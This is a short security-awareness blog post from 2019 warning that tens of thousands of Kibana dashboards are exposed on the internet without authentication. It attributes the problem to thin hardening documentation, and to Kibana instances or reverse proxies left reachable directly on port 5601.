Kibana: the new toy for pentesters, bughunters & hackers

What is Kibana?

Standing with website definition:

Kibana lets you visualize your Elasticsearch data and navigate the Elastic Stack, so you can do anything from learning why you’re getting paged at 2:00 a.m. to understanding the impact rain might have on your quarterly numbers. (or just leave your big data exposed in the wild as a complete noob — ndr)

Kibana is a very useful tools to interact with all the datas incoming to your Elasticsearch stack. Elastic and elasticsearch are data gathering focused applications which allows the users to use and process those data in a wide range of ways and for many different purposes.

Why is Kibana so dangerous?

As of today (25 March 2019) Shodan.io search gives a result of 26,833 (!!!) Kibana instances running on the internet (growing of around 35/70 per day during the last weeks). Off course, as any other well programmed web app, you can secure your public Kibana app access with many login methods. 
The real and practical issue stands in:

  1. Lack of clear documentation for the medium skilled developer about securing your Kibana instance
  2. A bad security chain practice which result in a secure server infrastructure being compromised by the last node of the security chain (!!!)

First point speak for itself.

About the real issue there: even if your server is super secured and well configured and your Elasticsearch is bound to 127.0.0.1 or localhost or whatever kind of loopback address, an unprotected Kibana app running on top of the elastisearch stack can compromise your server operativity and allow unauthenticated users to access Kibana dashboard (with admin privileges), thus gifting a strong foothold in further privilege escalation attacks to malicious entities.

In my researches I found that also a misconfigured Apache or Nginx reverse proxy which serves a login page on port 80 or 8080 can be easily bypassed and we can connect directly to Kibana app port (5601 by default) if this isn’t properly bound to private access.

More: https://twitter.com/InfoSecIta/status/1111243452602306561

Stay safe out there.

If this helped please share a coffee, a beer or some healthy juice with me donating with #bitcoin at 14Q6FnBkwFXchnUd3ddakTPiX29gTqUdaK